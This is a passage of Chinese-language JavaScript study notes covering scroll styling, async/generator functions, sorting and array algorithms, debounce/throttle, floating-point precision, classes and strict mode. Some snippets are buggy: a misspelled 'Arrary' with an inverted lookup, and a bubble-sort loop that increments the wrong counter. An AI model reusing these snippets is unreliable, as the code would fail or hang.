document.scrollingElement.style.cssText = `position:fixed;top:-${this.scrollTop}px`; } else { // 等到弹窗关闭时,还需要恢复定位,且位置保持不变。 // 这里有个注意事项,不同的定位方式导致元素的文档流模式不同,因此需要使用对应文档流的方法。 // 正常文档流,可以使用滚动,但定位模式下,只能使用定位方式,比如top document.scrollingElement.style.position = 'unset'; document.scrollingElement.scrollTop = this.scrollTop; // document.scrollingElement.scrollTo(0, this.scrollTop) // 这种方式也行 } } } </script> ``` **定制滚动条样式**::-webkit-scrollbar CSS伪类选择器影响了一个元素的滚动条的样式,伪类选择器类似::after,可以给任何元素添加。关于滚动条主要有以下几个选择器 **注意:**其实伪类的话一般是一个冒号,两个冒号的是伪元素。 - ::-webkit-scrollbar — 整个滚动条的样式,一般用来控制整个滚动条的整体样式 - ::-webkit-scrollbar-button — 滚动条上的按钮 (上下箭头). - ::-webkit-scrollbar-thumb — 滚动条上的滚动滑块. - ::-webkit-scrollbar-track — 滚动条轨道. - ::-webkit-scrollbar-track-piece — 滚动条没有滑块的轨道部分. - ::-webkit-scrollbar-corner — 当同时有垂直滚动条和水平滚动条时交汇的部分. - ::-webkit-resizer — 某些元素的corner部分的部分样式(例:textarea的可拖动按钮). ```scss body { // 注意滚动条的宽度,也是包含在元素的offsetWidth里面的 ::-webkit-scrollbar { // 滚动条隐藏,对于长页面来说,有滚动条有提示作用 // 对于明知可滚动的元素,可以隐藏滚动条 // display: none; width: 3px; height: 3px; } ::-webkit-scrollbar-thumb { border-radius: 10px; -webkit-box-shadow: inset 0 0 5px rgba(0,0,0,0.2); background: gold; } ::-webkit-scrollbar-track { -webkit-box-shadow: inset 0 0 1px rgba(0,0,0,0); border-radius: 10px; background: #ccc; } ::-webkit-scrollbar-track-piece { background: #42b983; } /* 注明start,表示不包含结尾处的轨道,当然end就正好相反 */ ::-webkit-scrollbar-track-piece:start { background: #2db7f5; } // 指定具体类 .scroll-xxx::-webkit-scrollbar { width: 10px; height: 10px; } } ``` 注意:有时候不太容易确定滚动条到底属于哪个元素的,因此有时候不太容易去掉指定滚动条或者给指定元素添加自定义滚动条 **移动端滚动页面不顺畅**,在一些ios手机上,有时候滚动列表页时,感觉页面不顺畅(感觉页面时黏在手上似的),设置如下可实现惯性滚动和弹性效果: - auto: 使用普通滚动, 当手指从触摸屏上移开,滚动会立即停止。 - touch: 使用具有回弹效果的滚动, 当手指从触摸屏上移开,内容会继续保持一段时间的滚动效果。继续滚动的速度和持续的时间和滚动手势的强烈程度成正比。 ```css -webkit-overflow-scrolling: touch; ``` ***async、generator、promise*** **异步编程的最高境界,就是不用关心它是不是异步。。。** **一句话,async 函数就是 Generator 函数的语法糖。** ES6 中提出一个叫生成器(Generator)的概念,执行生成器函数,会返回迭代器对象(Iterator),这个迭代器对象可以遍历函数内部的每一个状态。 ```js function* 
helloWorldGenerator() { yield 'hello'; yield 'world'; return 'ending'; } // 通过执行生成器返回迭代器对象 var helloWorldIterator = helloWorldGenerator(); helloWorldIterator.next(); // { value: "hello", done: false } helloWorldIterator.next(); // { value: "world", done: false } helloWorldIterator.next(); // { value: "ending", done: true } helloWorldIterator.next(); // { value: undefined, done: true } ``` 迭代器对象通过调用next()方法,遍历下一个内部状态。。。 对于一个读取文件的生成器函数,有: ```js var fs = require('fs'); var readFile = function (fileName){ return new Promise(function (resolve, reject){ fs.readFile(fileName, function(error, data){ if (error) reject(error); // 有错误直接抛出 resolve(data); // 否则, }); }); }; var gen = function* (){ var f1 = yield readFile('/etc/fstab'); var f2 = yield readFile('/etc/shells'); console.log(f1.toString()); console.log(f2.toString()); }; ``` 改成async函数,就如下: ```js var asyncReadFile = async function (){ var f1 = await readFile('/etc/fstab'); var f2 = await readFile('/etc/shells'); console.log(f1.toString()); console.log(f2.toString()); }; ``` 一比较就会发现,async 函数就是将 Generator 函数的星号(*)替换成 async,将 yield 替换成 await,仅此而已。 但async函数比generator函数有几点改进: 1. **内置执行器。**,Generator 函数的执行必须靠执行器,所以才有了 co 函数库,而 async 函数自带执行器。也就是说,async 函数的执行,与普通函数一模一样,只要一行。 2. **更好的语义。** async 和 await,比起星号和 yield,语义更清楚了。async 表示函数里有异步操作,await 表示紧跟在后面的表达式需要等待结果。 3. **更广的适用性。** co 函数库约定,yield 命令后面只能是 Thunk 函数或 Promise 对象,而 async 函数的 await 命令后面,可以跟 Promise 对象和原始类型的值(数值、字符串和布尔值,但这时等同于同步操作)。 4. **返回值是 Promise。**async函数的返回值是 Promise 对象,这比 Generator 函数的返回值是 Iterator 对象方便多了。你可以用then方法指定下一步的操作。 进一步说,async函数完全可以看作多个异步操作,包装成的一个 Promise 对象,而await命令就是内部then命令的语法糖。 async 函数的实现原理,就是将 Generator 函数和自动执行器,包装在一个函数里。 ```js async function fn(args) { // ... } // 等同于 function fn(args) { return spawn(function*() { // ... 
}); } function spawn(genF) { return new Promise(function(resolve, reject) { const gen = genF(); function step(nextF) { let next; try { next = nextF(); } catch (e) { return reject(e); } if (next.done) { return resolve(next.value); } Promise.resolve(next.value).then( function(v) { step(function() { return gen.next(v); }); }, function(e) { step(function() { return gen.throw(e); }); } ); } step(function() { return gen.next(undefined); }); }); } ``` async函数返回一个 Promise 对象,可以使用then方法添加回调函数。当函数执行的时候,一旦遇到await就会先返回,等到异步操作完成,再接着执行函数体内后面的语句。 ```js function timeout(ms) { return new Promise((resolve) => { setTimeout(resolve, ms); }); } async function asyncPrint(value, ms) { await timeout(ms); console.log(value); } asyncPrint('hello world', 5000); ``` 上面代码指定 5000 毫秒以后,输出hello world。 正常情况下,await命令后面是一个 Promise 对象,返回该对象的结果。如果不是 Promise 对象,就直接返回对应的值。 ```js async function f() { // 等同于 // return 123; return await 123; } f().then(v => console.log(v)) ``` 上面正常情况下await后是跟着promise(而这个promise会返回一个对象),但如果不是promise,而是一个常量,则没有返回值,此时需要用`return await`,其实这里还是会用`Promise.resolve()`包装一下,进而形成一个微任务; ***常用算法*** 复杂度:数组长度100,如果循环100次,其时间复杂度就是100,若里面再嵌套一个100数组的for循环,则复杂度就是100*100 = 10000次;若没有嵌套,只是并且的执行两个for循环,则复杂度是100+100 = 200,因此对于大数据情况,少用嵌套。。。 ```js var arr100 = new Arrary(100); var arr1000 = new Arrary(1000); let map = {}; arr100.forEach(item => { map[item.id] = item; item.arr = []; }) arr1000.forEach(item => { if(map[item.id]) return; map[item.id].arr.push(item) }) ``` 另外就是复杂度可分为时间和空间,时间的话可以理解为计算的次数,而空间的话,可以理解为占用的内存空间。一般为了提高性能都是空间换时间,也就是说,可以多占点内存,节省点时间,比如上面两个循环单独执行,而不是嵌套。 ***常用排序*** **冒泡排序:**(依次比较相邻的两数,然后交换位置,依次将最大或最小放到数组最后,每次循环都可减少一轮) 冒泡排序只涉及相邻数据的交换,只需要常量级的临时空间,因此空间复杂度为O(1) 最好的情况是待排序的数据已经是有序的,因此只需要一次冒泡就结束了,时间复杂度为O(n),当然最坏就是正好相反,所以为O(n的平方) ```js function bubleSort(arr) { let arrLen = arr.length if(arrLen <= 1) return arr //必须返回数组 for(let i = 0; i < arrLen - 1; i++){ let flag = true; //加标志位,如果一轮循环内没有一次交换数据,说明已排好序 for(let j = 0; j < arrLen - i -1; j++){ if(arr[j] > arr[j+1]){ [arr[j+1],arr[j]] = 
[arr[j],arr[j+1]] flag = false } // 还可以这样, // arr[j] > arr[j+1] && ([arr[j+1], arr[j]] = [arr[j], arr[j+1]]) } // 与内层for循环同级 if(flag) break } return arr } ``` 冒泡排序为了更好理解,可以分解为: 1. 先将数组中最大移到最后 ```js // 只需比较arr.length -1次 for(let j = 0; j < arr.length - 1; i++){ if(arr[j] > arr[j+1]){ [arr[j],arr[j+1]] = [arr[j+1],arr[j]] } } ``` 2. 重复多次,将数组中其他依次大的值移到后面 ```js for(let i = 0;i<arr.length-1;i++){ // 务必注意,外层每循环一次,内层就会减少一层遍历,因为最大值不需要再比对了 for(let j = 0;j<arr.length-1-i;j++){ if(arr[j]>arr[j+1]){ [arr[j],arr[j+1]] = [arr[j+1],arr[j]] } } } ``` 3. 如果数组的次序排列一次就好了,还需要再排吗 ```js for(let i = 0;i<arr.length-1;i++){ // 声明变量,假如已经排好序 let flag = true for(let j = 0;j<arr.length-1-i;j++){ if(arr[j]>arr[j+1]){ [arr[j],arr[j+1]] = [arr[j+1],arr[j]] // 如果交换次序,说明排序还没有完成 flag = false } } console.log(1) // 这里可以打印次数,如果已经排好序就不会再继续排序了 // 应该和内层for循环同级 if(flag) break } ``` **选择排序:**类似插入排序,也分为已排序和未排序区间,但是每次会从未排序区间找到最小的元素,将其放到已排序的末尾 ![consultCache](/jsArt/assets/images/math/math-select.jpg) ```js function selectSort(array) { if (Object.prototype.toString.call(array).slice(8, -1) === 'Array') { var len = array.length, temp; for (var i = 0; i < len - 1; i++) { var min = array[i]; for (var j = i + 1; j < len; j++) { if (array[j] < min) { [array[j], min] = [min, array[j]] } } array[i] = min; } return array; } else { return 'array is not an Array!'; } } ``` 选择排序也可以分解为如下: 1. 循环一遍,先找到数组中最小的值,因为后面要操作这个值,所以得记下index ```js // 假设最小值的index let minIdx = 0 // 至于length是否减一,就要根据需求是否要取到最后一个元素了 for(let i = 0; i< arr.length;i++){ if(arr[minIdx] > arr[i]){ // 将最小值的index赋值给minIdx minIdx = i } } ``` 2. 再比较选出来的最小值与假设的最小值 ```js let minIdx = 0 for(let i = 0; i< arr.length;i++){ if(arr[minIdx] > arr[i]){ minIdx = i } } if(arr[0] !== arr[minIdx]){ // 如果不等于,说明最小值不是假设的那个 // 然后交换二者位置,所以要存index [arr[0],arr[minIdx]] = [arr[minIdx],arr[0]] } ``` 3. 
假设每次外层循环的开始值是最小

```js
for(let i = 0;i<arr.length;i++){
  let minIdx = i
  for(let j =i+1;j<arr.length;j++){
    // 找到比当前“最小值”更小的元素,记下它的索引
    if(arr[minIdx] > arr[j]){
      minIdx = j
    }
  }
  if(arr[i] !== arr[minIdx]){
    [arr[i],arr[minIdx]] = [arr[minIdx],arr[i]]
  }
}
```

选择排序的空间复杂度为O(1),最好、最坏情况时间复杂度都为O(n的平方)。。。再来对比下三者

![consultCache](/jsArt/assets/images/math/insert-buble-select.jpg)

***常用算法***

```js
// 2、数组去重
// 2.1,利用forEach,将数组的元素取出来作为对象的key,然后赋予任意值,最后获取key列表
var uniqueArr = arr => {
  let obj = {}
  arr.forEach((val) => {
    obj[val] = 0
  })
  // 注意,返回的是可枚举的字符串数组
  return Object.keys(obj)
}

// 2.2,filter,indexOf只会返回第一个匹配数据的index
// 因此即使有多个相同的,也只会返回第一个
var uniqueArr = arr => {
  // Array.prototype.filter(callback(element[, index[, array]])[, thisArg])
  // 注意可选参数的意义;thisArg为执行callback时this值
  return arr.filter((ele, index, array) => {
    return index === array.indexOf(ele)
  })
}

// 2.3,set
var uniqueArr = arr => {
  // 注意只适用于数组为基本数据类型的
  return [...new Set(arr)]
}

// 2.4,reduce
// Array.prototype.reduce(callback(accumulator,currentValue[, currentIndex[, array]])[, initialValue])
// accumulator是累计器最终的值,若initialValue没传则默认取数组第一项,currentValue则自动为第二项
// 下面给累加器传的值是一个对象,相当于2.1方法的另外一种方式
var uniqueArr = arr.reduce((map,item) => {
  map[item] = 0
  // 不能在里面直接返回Object.keys(map)
  // 因为这里返回的map会依然作为下次迭代的初始值
  return map;
}, {})
Object.keys(uniqueArr)

// 3、字符串反转
var reverseString = str => {
  return [...str].reverse().join('')
}

// 4、统计一个字符串中出现频率最高的字母或数字
var strChar = str => {
  let string = [...str],
      maxVal = '',
      obj = {},
      max = 0;
  string.forEach( val => {
    obj[val] = obj[val] === undefined ?
1 : obj[val] + 1
    if(obj[val] > max){
      max = obj[val]
      maxVal = val
    }
  })
  return maxVal
}
```

***常用函数***

```js
// 防抖
// 小于设置的interval时间间隔都不会触发,因为clearTimeout了
// 注意执行clearTimeout后,fn.timerId的值仍然存在,因为这是变量,和队列里的任务没有关系
function debounce(fn, interval = 300) {
  // 这里返回一个函数,因为绑定事件只是想在事件发生时才会触发
  // 因此,如果只保留函数体,防抖依然会生效,只是绑定时会触发一次。
  return (...args) => {
    clearTimeout(fn.timerId)
    fn.timerId = setTimeout(() => {
      fn.apply(this, args)
    },interval)
  }
}

window.onresize = debounce(test, 500)
window.onresize = debounce(()=>{console.log('resizing')},500)
window.addEventListener('resize',debounce(()=>{console.log('resizing')},500))

// 节流
function throttle(fn, interval) {
  // let canRun = null // 注意这里canRun不是null
  let canRun = true;
  return function (...args) {
    // !canRun && return // 这样写错误
    if(!canRun) return
    canRun = false;
    setTimeout(()=>{
      fn.apply(this, args);
      canRun = true;
    },interval)
  }
}

window.onresize = throttle(()=>{console.log('resizing')})
//这里的e就是resize事件,但这里打印的是[object Event],因为``里面是字符串
window.onresize = throttle((e)=>{console.log('resizing',`e is ${e}`)})

// 实现lodash的get方法,
// Gets the value at path of object. If the resolved value is undefined, the defaultValue is returned in its place.
// _.get(object, path, [defaultValue])
function deepGet ( object, path, defaultValue ) {
  return ( !Array.isArray( path ) ? path.replace( /\[/g, '.' ).replace( /\]/g, '' ).split( '.'
) : path ) .reduce( (o, k) => ( o || {} )[k], object ) || defaultValue; } var obj = { 'a': [ { 'b': { 'c': 3 } } ] }; var result = deepGet( obj, 'a[0].b.c' ); console.log( result ); // => 3 result=deepGet(obj, ['a', '0', 'b', 'c']); console.log(result); // => 3 result=deepGet(obj, 'a.b.c', 'default'); console.log(result); // => default ``` **0.1+0.2 != .3?**: - 为什么0.1 + 0.2 不等于0.3。因为计算机不能精确表示0.1, 0.2这样的浮点数,计算时使用的是带有舍入误差的数 - 并不是所有的浮点数在计算机内部都存在舍入误差,比如0.5就没有舍入误差 - 具有舍入误差的运算结可能会符合我们的期望,原因可能是“负负得正” - 怎么办?1个办法是使用整型代替浮点数计算;2是不要直接比较两个浮点数,而应该使用bignumber.js这样的浮点数运算库 - 有一个标准IEEE754 在浮点数运算中产生误差值的示例中,最出名应该是0.1 + 0.2 === 0.30000000000000004了,到底有多有名?看看这个网站就知道了http://0.30000000000000004.com/。也就是说不仅是JavaScript会产生这种问题,只要是采用IEEE 754 Floating-point的浮点数编码方式来表示浮点数时,则会产生这类问题。下面我们来分析整个运算过程。 1. 0.1 的二进制表示为 1.1001100110011001100110011001100110011001100110011001 1(0011)+ * 2^-4; 2. 当64bit的存储空间无法存储完整的无限循环小数,而IEEE 754 Floating-point采用round to nearest, tie to even的舍入模式,因此0.1实际存储时的位模式是0-01111111011-1001100110011001100110011001100110011001100110011010; 3. 0.2 的二进制表示为 1.1001100110011001100110011001100110011001100110011001 1(0011)+ * 2^-3; 4. 当64bit的存储空间无法存储完整的无限循环小数,而IEEE 754 Floating-point采用round to nearest, tie to even的舍入模式,因此0.2实际存储时的位模式是0-01111111100-1001100110011001100110011001100110011001100110011010; 5. 
实际存储的位模式作为操作数进行浮点数加法,得到 0-01111111101-0011001100110011001100110011001100110011001100110100。转换为十进制即为0.30000000000000004。 总结下来就是:**64bit的存储空间无法存储完整的无限循环小数,因此将舍入后相加就出现** **0.1在计算机内部是如何表示的?** 但是可以通过一些第三方类库解决,或者用原生的方式避免 ```js parseFloat((数学表达式).toFixed(digits)); // toFixed() 精度参数须在 0 与20 之间 // 运行 parseFloat((0.1 + 0.2).toFixed(10))//结果为0.3 parseFloat((0.3 / 0.1).toFixed(10)) // 结果为 3 parseFloat((0.7 * 180).toFixed(10))//结果为126 parseFloat((1.0 - 0.9).toFixed(10)) // 结果为 0.1 parseFloat((9.7 * 100).toFixed(10)) // 结果为 970 parseFloat((2.22 + 0.1).toFixed(10)) // 结果为 2.32 Number(parseFloat((2.22 + 0.1).toFixed(10))) // 结果为2.32数字格式 Number(parseFloat((0.2 + 0.1).toPrecision(1)) // 结果为0.3数字格式,toPrecision(位数)设置精度的 ``` ***函数柯理化*** 参考:[柯理化编程思想][curringProgramTheroyUrl]、[柯理化函数(简书)][curringFunctionUrl] [curringProgramTheroyUrl]:https://www.manster.me/?p=271 [curringFunctionUrl]:https://www.jianshu.com/p/25dcf49e26e6 柯理化函数思想是一种编程思想,体现出JS的预处理机制,预处理什么呢?就是把多参数的函数变成一个接受单一参数的函数。 ```js function add(fn, ...args1) { return (...args2) => { return fn.apply(this, [...args1, ...args2]) } } function sum(...args) { return args.reduce((cur, next) => { return cur += next; }) } console.log(add(sum, 1,2)(3,4)) ``` 其实更多的是预处理this指向的问题,处理this指向问题,JS提供了两个方法call() 和 apply() 方法,两个区别在于后者传参是以数组形式传递进去的,前者是单个传入;共同点就是都是在**改变this指向的同时将方法运行**。 但是有时候并不想让方法立即执行,这个时候使用H5中新增的方法bind() ,bind方法体现出了柯理化函数思想,通俗点就是他可以将函数中的this指向改变但同时不立即运行方法,等需要运行的时候再运行。使用bind,返回改变上下文this后的函数 ***null和undefined*** 参考:[null和undefined的由来及区别][nullAndundefined(阮一峰)] 只所以:typeof null返回"object",因为不同的对象在底层都表示为二进制,在 JavaScript 中二进制前三位都为 0 的话会被判 断为 object 类型,null 的二进制表示是全 0,自然前三位也是 0,所以执行 typeof 时会返回“object”。 null表示"没有对象",即该处不应该有值。undefined表示"缺少值",就是此处应该有一个值,但是还没有定义 ***数组方法*** - forEach(fn)遍历数组, - pop()删除最后一个并返回元素 - shift()删除第一个并返回元素 - unshift()在头部增加一个元素,返回数组长度 - indexOf查找并返回索引(字符串也可以用) - splice(pos, 1)通过索引删除一个元素并返回删除元素组成的数组,省略数量则截取开始到结束的数组并返回,还可以在删除的位置添加元素,改变原数组。负数则反向 - slice([begin[,end]])前包后不包,都省则浅复制 - reverse()反转数组 - toString()返回一个字符串,表示指定的数组及其元素 - 
Array.from() 方法从一个类似数组或可迭代对象中创建一个新的数组实例
- Array.of() 方法创建一个具有可变数量参数的新数组实例,而不考虑参数的数量或类型
- find() 方法返回数组中满足提供的测试函数的第一个元素的值。否则返回 undefined
- arr.flat([depth])方法会递归到指定深度将所有子数组连接,并返回一个新数组。(扁平化嵌套数组)
- 可以使用数组的length属性截取数组,清空数组(置0)

JavaScript 数组的 length 属性和其数字下标之间有着紧密的联系。数组内置的几个方法(例如 join、slice、indexOf 等)都会考虑 length 的值。另外还有一些方法(例如 push、splice 等)还会改变 length 的值。

**注意:**不要使用delete删除数组的元素,因为使用 delete 只是用 undefined 来替换掉原有的项,并不是真正的从数组中删除。

```js
var items = [12, 548 ,'a' , 2 , 5478 , 'foo' , 8852, , 'Doe' ,2154 , 119 ];
items.length;    // return 11
delete items[3]; // return true
items.length;    // return 11
items.splice(3,1) // 返回被删除项组成的数组
items.length;    // return 10
```

map方法:

```js
var new_array = arr.map(function callback(currentValue[, index[, array]]) {
  // Return element for new_array
}[, thisArg])
```

```js
// 编写一个程序将数组扁平化并去除其中重复部分数据,最终得到一个升序且不重复的数组
var arr = [ [1, 2, 2], [3, 4, 5, 5], [6, 7, 8, 9, [11, 12, [12, 13, [14] ] ] ], 10];
// Set的参数可以是数组还可以是伪数组,Infinity是正无穷大,返回不重复数组
// Array.from接受伪数组,返回数组实例,准确来说是伪数组对象或可迭代对象,其实具有length属性即可
// Array.from(arrayLike[, mapFn[, thisArg]])
Array.from(new Set(arr.flat(Infinity))).sort((a,b)=>{ return a-b})

// 注意不能写成 Array.from(10),数字没有 length 属性,会得到空数组
Array(10).fill(0).map(() => 1);
// 等价于
Array.from({length: 10}, () => 1);

// 快速生成序列数组还可以如下
[...Array(10).keys()] // [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

Array(10).map((item, index) => index)
// 这里只是声明一个长度为10的数组空间,但每个空间并没有值,map会跳过空位
// [empty × 10]

// 如果不能保证数据都是数字或其`valueOf()`没有返回数值类型,用下面
Array.from(new Set(arr.flat(Infinity))).sort((a, b) => {
  if (a > b) {
    return 1
  } else if (a < b) {
    return -1
  } else {
    return 0
  }
})
```

***return 语法***

return语句的作用是指定函数返回的值。**return语句只能出现在函数体内,出现在代码中的其他任何地方都会造成语法错误**!用return语句来终止一个函数的执行。如果return后面不返回值,则把值undefined赋给调用当前函数的表达式。

return语句一般用法:

1. 返回函数结果:return a;
2.
阻止默认事件或者阻止往下执行:return false; ```js for(var i=0;i<5;i++){ return 3 } // Uncaught SyntaxError: Illegal return statement function dd(){ for(var i=0;i<4;i++){ if (i === 2) { return 5; } } } // 5 ``` 观察上面代码,一个报错,一个不报错,这是因为一个返回是在循环体,一个是在函数体。return 语句只能出现在函数体中。 ***for in与for of循环区别*** 遍历数组通常使用for循环,es5也可以使用forEach,只是forEach遍历数组无法break(使用会报`Illegal break statement`错误),使用return也无法回到外层函数(只是当前循环return后面的语句不执行了,下一次的循环依然会执行) ```js var arr = [1,2,3,4] arr.forEach(item => { if(item == 2){ break } console.log(item) }) // Uncaught SyntaxError: Illegal break statement arr.forEach(item => { if(item == 2){ return 22 } console.log(item) }) // 1 3 4 ``` `for in`更适合遍历对象,遍历数组会有以下问题: - index索引为字符串数字,不能直接进行几何运算 - 使用for in会遍历数组所有的可枚举属性,包括原型。 - 遍历顺序有可能不是按照实际数组的内部顺序 ```js var arr = [1,2,3,4] arr.test = 'test me' for(item in arr){ // 即可以跳出整个循环 if(item == 2) break // 打印的字符串的key,如果有属性,也会将属性的key打印出来 console.log(item, typeof(item)) } // 0 string // 1 string // 定义数组后,还可以用 Object.defineProperty(arr,'newKey',{ value : 'this is newKew value', enumerable : true //可枚举,默认false }) // 此时数组为 [1, 2, 3, 4, newKey: "this is newKew value"] ``` **注意:**因为数组用for in循环其实打印的是索引,索引的话肯定是有顺序的,因此针对第三条并准确 但是如果用for in遍历对象的话,因为Chrome、 sarari、 firebox、 Opera 中使用 for-in 语句遍历对象属性时会遵循一个规律,**它们会先提取所有 key 的 parseFloat 值为非负整数的属性, 然后根据数字顺序对属性排序首先遍历出来,然后按照对象定义的顺序遍历余下的所有属性。** ```js var arr = {b:'bb' ,a:'aa' ,"3":33 ,'1':11} for(var item in arr){console.log(item)} // 1 // 3 // b // a ``` **注意:**从以上代码可以看出,经过parseFloat转化后的非负整数3和1,排序就变成了1,3。。。但b和a的顺序还是没有改变 综上如果想遍历**数组又想按顺序**的话,可以用`for of`来执行 ```js var arr1 = [ '2', '1', 'b', 'a'] for(var item of arr1) console.log(item) // 2 1 b a var arr1 = [ '2', '1', 'b', 'a'] for(var item of arr1) { if (item === '1') { // 或者break return; } console.log(item) } // 2 ``` `for...of`语句在可迭代对象(包括 Array,Map,Set,String,TypedArray,arguments 对象等等)上创建一个迭代循环,调用自定义迭代钩子,并为每个不同属性的值执行语句。。。因此对于可迭代的对象,都能用`来执行`,而普通的{}对象不可以,会报错`xxx is not iterable` ***基于对象与OOP(面向对象)*** 面向对象编程是一种基于以下思路的程序设计方法:将关注点置于 
对象(Object)本身,**对象的构成要素包含对象的行为及操作B,以此为 基础进行编程**。这种方法使程序易于复用,软件的生产效率因而得以 提升。其中所使用的主要编程技巧有继承、封装、多态三种。继承指的是通过继承已存在的类所拥有的成员而生成新的类。封 装指的是在类所拥有的成员中,隐藏掉那些没有必要展现给该类调用 者的成员。多态指的是针对同一种消息,不同的对象可以进行不同的 操作。 在面向对象编程中,使用了一种称为“类”的要素,通过把若干个 类组装到一起构建一个完整的程序。从这一点来看,可以说类就是程 序的组件(Component)。面向对象编程的关键在于能否灵活地运用类。类是对象的定义,而对象是 类的实例(Instance)。 在使用古老的 C 语言或 BASIC 等语言编程时(它们不是面向对象 的编程语言,即不是用于表达面向对象编程思想的语言),用“函数” 表示指令,用“变量”表示数据。对于 C 语言或是 BASIC 的程序员而 言,程序就是函数和数据的集合。 Java 和 .NET 其实是位于操作系统(Windows 或 Linux 等)之上,旨在通过隐藏操作系统的复杂性从而提升开发效率的 程序集,**这样的程序集也被称作“框架”(Framework)。框架由两部分构成,一部分是负责安全执行程序的“执行引擎”,另一部分是作为程 序组件集合的“类库”**。 ![java框架图示](/jsArt/assets/images/js-theory/java-frame.png) 无论是使用 Java 还是 .NET,都需要依赖类库进行面向对象编程。 在 Java 中,使用的是与框架同名的 Java 语言。而在 .NET 中,使用的 是 .NET 框 架 支 持 的 C#、Visual Basic.NET、Visual C++、NetCOBOL 等语言进行开发。 js的核心是支持面向对象,但准确来说是基于对象 >oop(object oriented programming)面向对象编程是用抽象方式创建基于现实世界模型的一种编程方式。 基于对象,就是一个工程师建了一栋房子,然后其它的工程师按照这个房子的样子去建造其它的房子 面向对象,就是一个工程师再图纸上设计出一栋房子的样子,然后其它工程师按照这个图纸的设计去建造房子 也就是说: 基于对象是先有一个具体的对象,然后在这个对象的基础上创建新的对象 面向对象就是先有一个抽象的对象描述,然后以此为蓝本构建具体对象 一般的面向对象语言中的类的概念 都是 一个 抽象的声明,当 new 出来一个对象的时候,就是依据 类的声明给造出来的,就像是模子里面刻出来的。 javascript是基于对象的,那么它所有的对象都是从原型对象继承而来,和原型模式大概相似,Javascript的动态特性,可以随时的给对象的原型添加方法或属性,然后new出来的对象就有了。 但作为es6的class,其实并不能说是面向对象,可以将class看成一个语法糖,新的class写法只是让对象原型的写法更加清晰,**更像面向对象编程的语法**而已,如下: ```js // 构造函数 function Point (x) { this.x = x } // 给原型添加属性 Point.prototype.toString = function () { return `this.x is ${this.x}` } // class写法 class Point { // 构造函数 constructor (x) { this.x = x } // 直接添加方法 toString () { return `this.x is ${this.x}` } } // 实例化 var newPoint = new Point('test') newPoint.toString() // this.x is test // super关键字是用于访问和调用一个对象的父对象上的函数 // class实现继承是通过 extends class colorPoint extends Point { constructor (x, color) { super(x) this.color = color } toString () { return `this.color is ${this.color} & ${super.toString()}` } } ``` **严格模式('use strict')** 严格模式不仅仅是一个子集,它的产生是为了形成与正常代码不同的语义。常见的规则如下 - 未声明而直接被赋值的情况将报错 - 八进制012模式将不会允许,新模式为拼接'0o',即0o12 - 对象中的属性名必须唯一 - 函数的参数名必须唯一 
- 禁止删除已声明的变量 - arguments对象只会保存函数被调用时的原始参数,且再修改无效 - 不再支持arguments.callee(非严格模式下,指向正在执行的函数) - 通过this传递给一个函数的值不会被强制转换为一个对象 我们应该知道,在非严格模式下,对于普通的函数来说,this总会是一个对象。。。不管调用函数时,this它本来就是一个对象,还是用布尔值,字符串或者数字等,调用函数时,函数里面this都会被封装成对象;即使使用undefined或者null调用函数时,this代表的全局对象(使用call, apply或者bind方法来指定一个确定的this)。这种**自动转化为对象的过程不仅是一种性能上的损耗**,同时在浏览器中暴露出全局对象也会成为安全隐患,因为全局对象提供了访问那些所谓安全的JavaScript环境必须限制的功能的途径。所以对于一个开启严格模式的函数,指定的this不再被封装为对象,而且**如果没有指定this的话它值是undefined,但是如果你指定null,undefined,true则this分别是null,undefined,Boolean** ```js 'use strict' function getValType(val){ return Object.prototype.toString.call(val).slice(8,-1) } function my(){ return this } console.log(my() === window) // false console.log(my() === undefined) // true console.log(getValType(my.call(1))) // Number console.log(getValType(my.apply(null))) // Null console.log(getValType(my.apply(undefined))) // Undefined console.log(getValType(my.bind(true)())) // Boolean // 非严格模式 console.log(my() === window) // true console.log(my() === undefined) // false console.log(getValType(my.call(1))) // Number console.log(getValType(my.apply(null))) // Window console.log(getValType(my.apply(undefined))) // Window console.log(getValType(my.bind(true)())) // Boolean ``` 另外严格模式下,一部分字符变为保留的关键字,这些字符包括implements, interface, let, package, private, protected, public, static和yield等 **es6引入的class类实质上是js现有的基于原型继承的语法糖,类语法不会为js引入新的面向对象的继承模型**。。。 类的定义有两种方式 ```js // 方式一:类声明 class Rectangle { constructor(height, width) { this.height = height; this.width = width; } } // 方式二:类表达式(匿名类,命名类) /* 匿名类 */ let Rectangle = class { constructor(height, width) { // ... } }; /* 命名的类 */ let Rectangle = class Rectangle { constructor(height, width) { // ... 
} };
```

**务必注意:**类class没有变量提升;类声明和类表达式的主体(其实就是定义类的具体的内容)都执行在严格模式下,比如构造函数、静态方法、原型方法、getter和setter都在严格模式下执行,也就意味着,**this在严格模式下并不会自动被包装成对象**。。。根据默认绑定this规则,此时this会绑定到undefined上,因此为了防止这样,需要用下面的super方法。

**务必注意:**在使用**extends扩展子类时,子类如果有constructor,则必须先调用super方法**,否则新建实例时会报错。这是因为子类自己的this对象,必须先通过父类的构造函数完成塑造,得到与父类同样的实例属性和方法,然后再对其进行加工,加上子类自己的实例属性和方法。如果不调用super方法,子类就得不到this对象。

1. super([arguments]) // 调用父类或父对象的构造函数,参数作为构造函数的参数传入,而且只能在子类的构造函数里调用
2. super.functionOnParent([arguments]) // 指定父类或父对象上的方法并调用,可以在子类的任何地方调用

***高阶函数:***

在js中,函数可以赋值给某个变量,同时函数的参数也可以接受变量,那么一个函数就可以接受另一个函数作为参数,这种函数就叫高阶函数。

***沙箱、闭包***

从语言学的角度上来说,允许代码无节制地使用全局变量,是最错误的选择之一。而更可怕的,就是一个变量"可能"成为全局的(在未知的时间与地点)。但是这两项,却伴随JavaScript这门语言成功地走到了现在。

也许是限于浏览器应用的规模,所以这一切还迟迟没有酿成灾难。在此之前,出现了两种解决方案。一种是ECMA在新的规范(Edition 5)中对此做出了限制,其中最重要的一条便是eval()的使用变得不再随意和无度。而另一种方案,则是相对没有那么官僚与学术的,尽管也拥有一个同样学术的名字:沙箱。

沙箱(Sandbox)并不是一个新东西,即使对于JavaScript来说,也已经存在了相当长的时间。**在SpiderMonkey(第一款JavaScript引擎)的源代码中,就明确地将一个闭包描述为一个沙箱**。这包含着许多潜在的信息:它有一个初始环境,可以被重置,可以被复制,以及最重要的,在它内部的所有操作,不会影响到外部。

当然事实上远非如此。JavaScript里的闭包只是一个"貌似沙箱"的东西--仍然是出于JavaScript早期的语言规范的问题,闭包不得不允许那些"合法泄漏"给外部的东西。

